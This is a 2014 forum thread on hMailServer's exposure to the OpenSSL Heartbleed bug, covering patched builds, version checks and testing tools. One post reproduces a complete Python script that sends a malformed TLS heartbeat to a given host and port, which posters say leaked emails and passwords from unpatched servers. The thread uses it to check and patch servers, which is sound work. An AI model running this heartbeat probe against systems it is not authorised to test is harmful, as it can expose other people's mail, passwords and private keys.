Heartbleed Bug in OpenSSL
-
- New user
- Posts: 3
- Joined: 2014-04-08 11:10
Heartbleed Bug in OpenSSL
Hi,
is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)
This is a VERY serious problem
Best regards,
B
is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)
This is a VERY serious problem
Best regards,
B
Re: Heartbleed Bug in OpenSSL
Yes, hMailServer is vulnerable. Even worse, OpenSSL is statically linked, so there is no way for the end user to patch this until an official update is released.
I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.
I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.
-
- New user
- Posts: 3
- Joined: 2014-04-08 11:10
Re: Heartbleed Bug in OpenSSL
Oooh boy....
Re: Heartbleed Bug in OpenSSL
I will look into this and release a patch.
Re: Heartbleed Bug in OpenSSL
Reading the full information release and the link to openssl.org news release it seems there is an easy fix.
Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
What versions of the OpenSSL are affected?
Status of different versions:
•OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
•OpenSSL 1.0.1g is NOT vulnerable
•OpenSSL 1.0.0 branch is NOT vulnerable
•OpenSSL 0.9.8 branch is NOT vulnerable
Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.
Re: Heartbleed Bug in OpenSSL
Hi,
Is there anyway I can tell what version of Open SSL my installation is using?
Cheers
Is there anyway I can tell what version of Open SSL my installation is using?
Cheers
Re: Heartbleed Bug in OpenSSL
Unfortunately, this issue is not about certificates. It is an issue in the implementation of the TLS protocol. Long story short, it is currently possible for anyone, without authentication, to grab the passwords of any recently logged on users, their recently sent e-mails, or your cryptographic keys, over the internet and without leaving a trace. The only solution for this issue is to update hMailServer once a patch is out.percepts wrote:Just use one of the earlier releases of openssl or the fix release(OpenSSL 1.0.1g) to regenerate your certificates.
@martin: I am looking forward to the update.
hMailServer 5.4 is using OpenSSL 1.0.1c.SCOOBY wrote:Is there anyway I can tell what version of Open SSL my installation is using?
Re: Heartbleed Bug in OpenSSL
I sent a security newsletter a while back informing users about this issue.
Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.
Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.
Re: Heartbleed Bug in OpenSSL
Thanks, eagerly awaiting the update!
Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?
Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?
Re: Heartbleed Bug in OpenSSL
If you don't have TCP/IP ports, then OpenSSL isn't executed within hMailServer so then it should not be vulnerable.
Re: Heartbleed Bug in OpenSSL
From what version use hmail OpenSSL 1.0.1?
Re: Heartbleed Bug in OpenSSL
2014-04-08 5.4-B2014040801
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Upated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.01.1g & incorporated into this build.
http://www.hmailserver.com/forum/viewto ... 10&t=21420
EDIT:
Also posted non-static linked build so openssl dll's can be used if needed. Obviously weird things can happen if you use incompatible DLL's so know what you are doing & only use if needed.
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Upated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.01.1g & incorporated into this build.
http://www.hmailserver.com/forum/viewto ... 10&t=21420
EDIT:
Also posted non-static linked build so openssl dll's can be used if needed. Obviously weird things can happen if you use incompatible DLL's so know what you are doing & only use if needed.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
Sorry if I'm being dense, but where do I download it from?
Re: Heartbleed Bug in OpenSSL
Thanks Bill48105, I can confirm that this update resolves the issue.
Re: Heartbleed Bug in OpenSSL
You go to the experimental thead:SCOOBY wrote:Sorry if I'm being dense, but where do I download it from?
http://www.hmailserver.com/forum/viewto ... 10&t=21420
Scroll WAYYY down to where the downloads are:
Code: Select all
NEWEST & MOST RECENT:
=== 8Apr2014 === (BASED on official 5.4 B1950 + to-date experimental changes)
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
NOTE: Should be stable but not recommended live on production until tested further
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
Ok great! How did you test it?mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Thx
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).Bill48105 wrote:Ok great! How did you test it?mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Thx
Bill
Re: Heartbleed Bug in OpenSSL
OK cool thx. Yup it claims it's ok now. Assuming it is true it's good then eh.mlg.odk wrote:There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).Bill48105 wrote:Ok great! How did you test it?mlg.odk wrote:Thanks Bill48105, I can confirm that this update resolves the issue.
Thx
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.
Any ideas?
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.
Any ideas?
Re: Heartbleed Bug in OpenSSL
Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.
Currently compiling the new version.
Currently compiling the new version.
Re: Heartbleed Bug in OpenSSL
martin wrote:Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.
Currently compiling the new version.
Luc from IRC tested before & after with the python script & claims it reported vulnerable before & OK after.SCOOBY wrote:Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.
Any ideas?
If anyone else wants to test:
https://gist.github.com/sh1n0b1/10100394
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
heartbleedtest.py
usage:
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465
Code: Select all
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
# Modified for simplified checking by Yonathan Klijnsma
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
target = None
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
return None, None, None
return typ, ver, pay
def hit_hb(s):
global target
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print target + '|NOT VULNERABLE'
return False
if typ == 24:
if len(pay) > 3:
print target + '|VULNERABLE'
else:
print target + '|NOT VULNERABLE'
return True
if typ == 21:
print target + '|NOT VULNERABLE'
return False
def main():
global target
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.connect((args[0], opts.port))
target = args[0]
sys.stdout.flush()
s.send(hello)
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465
CIDR to RegEx: d-fault.nl/cidrtoregex
DNS Lookup: d-fault.nl/dnstools
DKIM Generator: d-fault.nl/dkimgenerator
DNSBL Lookup: d-fault.nl/dnsbllookup
GEOIP Lookup: d-fault.nl/geoiplookup
DNS Lookup: d-fault.nl/dnstools
DKIM Generator: d-fault.nl/dkimgenerator
DNSBL Lookup: d-fault.nl/dnsbllookup
GEOIP Lookup: d-fault.nl/geoiplookup
Re: Heartbleed Bug in OpenSSL
http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
Re: Heartbleed Bug in OpenSSL
That's not looking good in terms of trusting that test.. Did you try the python script?sowen wrote:http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
I'd say the filippo.io bug is faulty then:
- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;
- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and
- I've tried filippo.io after patching which said I was *not* vulnerable.
So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;
- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and
- I've tried filippo.io after patching which said I was *not* vulnerable.
So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Last edited by lucb1e on 2014-04-08 21:01, edited 1 time in total.
Re: Heartbleed Bug in OpenSSL
Thanks for the info. I'd sooner say not to trust that site at this point. Maybe a bug, maybe not designed to test mail or maybe they are a front to gather info about vulnerable servers.lucb1e wrote:I'd say the filippo.io bug is faulty then:
- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;
- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and
- I've tried filippo.io after patching whcih said I was *not* vulnerable.
So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
Re: Heartbleed Bug in OpenSSL
Cool thx martin.martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
-
- New user
- Posts: 3
- Joined: 2014-04-08 11:10
Re: Heartbleed Bug in OpenSSL
Great Job!
Thanks a lot for the fast response!
Best regards,
B
Thanks a lot for the fast response!
Best regards,
B
Re: Heartbleed Bug in OpenSSL
Thanks guys, server patched and hopefully that is that!!
Re: Heartbleed Bug in OpenSSL
I don't need StartTLS (but am happy to test it)Bill48105 wrote:Cool thx martin.martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc
Where is this stuff at in terms of the new build?
Just 'cause I link to a page and say little else doesn't mean I am not being nice.
https://www.hmailserver.com/documentation
https://www.hmailserver.com/documentation
Re: Heartbleed Bug in OpenSSL
martin is moving away from SVN repo in favor of github. He had setup a 'dev' one there awhile back but I stuck on the svn until I was able to get my local copy cleaned up enough to commit. I've just not had time. Now martin is setting up a new copy on github and setting up automated builds. Should help keep them in sync.mattg wrote:I don't need StartTLS (but am happy to test it)Bill48105 wrote:Cool thx martin.martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc
Where is this stuff at in terms of the new build?
So long story short only my builds have a lot of the recent 'experimental' changes until I can get them to martin so he can approve & merge with his but no ETA
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
Re: Heartbleed Bug in OpenSSL
Martin,martin wrote:There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe
I'm running it myself and it passes the heartbleed tests.
I want to thank you (and of course everyone who contributed!) for your quick reaction.
This is a level of service i would expect from a company, but not from a small project (most companies would most likely not react as fast as you did!).
The last 24 hours weren't the brightest in the history of the internet, but hmailserver and many other opensource projects have done a great job in mitigating the most severe incident i can remember in the past 7 years. It was the sysadmins nightmare come true, every SSL-Port an enemy.
It's time to get some sleep, now that the Heartbleeding has stopped...
Thanks a Million and keep up the great work!
Best Regards,
Jan
Re: Heartbleed Bug in OpenSSL
For what it's worth, I found out that the on-line testing at
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io
Re: Heartbleed Bug in OpenSSL
That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.
Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
If you have strange problems or errors use the log analyzer! http://log.damnation.org.uk
Join us on IRC! http://hmailserver.com/irc_fullscreen.php
Join us on IRC! http://hmailserver.com/irc_fullscreen.php
Re: Heartbleed Bug in OpenSSL
The python scripts above work. I tested them with hmail.Caspar wrote:That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.
Simple: if you have used SSL with your server Update now to the latest stable or experimental build (whatever is that you need, because of specific options). After you have done that create a new certificate since the Private key could have been compromised.
Steps on to do a new certificate you can find here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.Bill48105 wrote:The python scripts above work. I tested them with hmail.Caspar wrote:...
If you have strange problems or errors use the log analyzer! http://log.damnation.org.uk
Join us on IRC! http://hmailserver.com/irc_fullscreen.php
Join us on IRC! http://hmailserver.com/irc_fullscreen.php
Re: Heartbleed Bug in OpenSSL
Yeah I hadn't tested it on a non SSL port but guess that makes sense since handshake hasn't completed yet on STARTLS enabled port although it is an SSL socket even before the handshake. But if one wants to test just test SSL & if it's OK STARTTLS ports would be too unless someone proves otherwise.Caspar wrote:It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.Bill48105 wrote:The python scripts above work. I tested them with hmail.Caspar wrote:...
Bill
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
Re: Heartbleed Bug in OpenSSL
I would also like a definitive answer to this.Sune wrote:Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
Re: Heartbleed Bug in OpenSSL
Version 5.3.3 - Build 1879 (2010-06-06) - Production
Issue 312: In some cases, the POP3 server returned incorrect data which could lead to corrupt attachments. Changes have been made to prevent this error. The error was apparent when retrieving PDF files which had been sent using Outlook Express.
Issue 313: If hMailServer was configured to download messages from a server which did not support UIDL, hMailServer timed out. hMailServer has been changed to disconnect immediately and report an error when this happens. The External account functionality in hMailServer does not work with POP3 servers not supporting UIDL.
Issue 314: If DKIM was enabled and a user sent an email with no text in the body, hMailServer did not correctly sign the message.
Issue 1879: OpenSSL has been upgraded to version 0.9.8o.
hMailServer build LIVE on my servers: 5.4-B2014050402
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***
#hmailserver on FreeNode IRC https://webchat.freenode.net/?channels=#hmailserver
*** ABSENT FROM hMail! Those in IRC know how to find me if urgent. ***